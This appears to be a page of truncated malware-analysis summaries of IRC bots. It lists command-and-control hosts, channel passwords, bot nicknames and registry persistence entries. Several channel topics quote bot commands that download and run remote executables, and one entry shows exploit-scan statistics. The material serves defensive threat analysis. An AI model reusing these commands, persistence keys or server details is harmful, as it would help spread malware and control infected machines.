Remote Host Port Numberproxim.ircgalaxy.pl 65520 NICK zttwuhgsUSER t020501 . . :-Service Pack 2JOIN &virtu * The following files were modified: o [pathname with a string SHARE]msinfo32.exe o [pathname with a string SHARE]sapisvr.exe o %ProgramFiles%Internet ExplorerConnection Wizardicwconn1.exe o %ProgramFiles%Internet ExplorerConnection Wizardicwconn2.exe o %ProgramFiles%Internet ExplorerConnection Wizardicwrmind.exe o %ProgramFiles%Internet ExplorerConnection Wizardicwtutor.exe o %ProgramFiles%Internet ExplorerConnection Wizardinetwiz.exe o %ProgramFiles%Internet ExplorerConnectionRead more...

Remote Host Port Numbercx10man.weedns.com 3305 PASS secretpassNICK b2s5zj80qUSER cb5tcxdf2 * 0 :USA|XP|373 Resolved : [cx10man.weedns.com] To [210.166.223.51]Resolved : [cx10man.weedns.com] To [209.235.252.106]Resolved : [cx10man.weedns.com] To [200.49.145.197]Resolved : [cx10man.weedns.com] To [92.240.234.164] * To mark the presence in the system, the following Mutex object was created: o gx000032 * The following port was open in the system: PortRead more...

cracker019.dyndns.tv:6667 NICK {USA-XP-3917184}USER {USA-XP-3917184} * 0 :COMPUTERNAMEMODE {USA-XP-3917184} +iRJOIN #torrentPRIVMSG #torrent :.4.New Infection!MODE #torrent +iMmNICK {USA-XP-5140760}USER {USA-XP-5140760} * 0 :COMPUTERNAMEMODE {USA-XP-5140760} +iRNICK {USA-XP-4060724}USER {USA-XP-4060724} * 0 :COMPUTERNAMEMODE {USA-XP-4060724} +iR Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + MSN Messanger = “%Windir%System.exe” so that System.exe runs every time Windows starts Memory ModificationsRead more...

* Requested Host: dbsarticles.com* Resulting Address: 75.102.24.35 * IRC Data o User Name: XP-4072 o Host Name: * o Server Name: o Real Name: MICHAEL-F156CF7 o Password: xxx o Nick Name: [USA|00|P|55591] o Non RFC Conform: 1 + Channel # Name: #imb # Password: test # Topic Deleted: :.msn.stop|.msn.msg foto 😀 http://yorimage.yo.ohost.de/photo.php?= # Transport Protocol:Read more...

rohypnol.bounceme.net:6667PASS pass8900NICK n-870346USER ecdsdhrp 0 0 :n-870346USERHOST n-870346MODE n-870346 -x+BJOIN #channel pass8900NOTICE n-870346 :.VERSION mIRC v6.14 Khaled Mardam-Bey.PRIVMSG #channel :[MAIN]: Status: Ready. Bot Uptime: 0d 0h 0m.PRIVMSG #channel :[MAIN]: Bot ID: Tr0gBot.PRIVMSG #channel :[Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 0hRead more...

sb.123back.com 89.46.101.186 * C&C Server: 89.46.101.186:7000 * Server Password: * Username: bwkpfn * Nickname: rykrcm * Channel: #n8# (Password: trb123trb) * Channeltopic: : Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{2891BC5C0-4FCB-11cF-AAX5-81EX1F635612} “StubPath” = c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013is32.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel” FileRead more...

us.123back.com 89.46.101.186 * C&C Server: 89.46.101.186:6667 * Server Password: * Username: XP-9860 * Nickname: [DEU|00|P|20902] * Channel: #us# (Password: hiphop) * Channeltopic: :.nzel.start http://tamanjurong.sg/us9.exe C:iusw.exe 1 Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “WindowsXPP” = ¿›Û¥oginWindow.exeHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “WindowsXPP” = ¿›Û¥oginWindow.exeHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:IM.exe” = c:IM.exe:*:Enabled:WindowsXPPHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active” =Read more...

java.KUTLUFAMILY.COM 67.159.9.24membres.lycos.fr membres.lycos.fr 213.131.252.251Download URLshttp://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr) * C&C Server: 67.159.9.24:81 * Server Password: * Username: SP3-186 * Nickname: [N00_DEU_XP_8857119]xð@ * Channel: (Password: ) * Channeltopic: * C&C Server: 67.159.9.24:80 * Server Password: * Username: SP3-384 * Nickname: [00_DEU_XP_2207577] * Channel: #aa (Password: ) * Channeltopic: :.asc -S -s |.http http://94.76.194.116/aa.exe |.asc exp_allRead more...

{“lebanonbt.info”, 7000},{“lebanonbt.info”, 6667},{“lebanonbt.info”, 3211}, chanel:#lalachanelpass:trb123trbchanelusb:#usb

Remote Host Port Numbergs.unicatz.com 2010 00000000 | 4E49 434B 2058 505C 4E73 6533 5C0A 5553 | NICK XPNse3.US00000010 | 4552 206C 614D 6572 2022 2220 2267 732E | ER laMer “” “gs.00000020 | 756E 6963 6174 7A2E 636F 6D22 203A 0334 | unicatz.com” :.400000030 | B703 6CE0 0334 024D 0203 E972 0334 B720 | ..l..4.M…r.4.00000040Read more...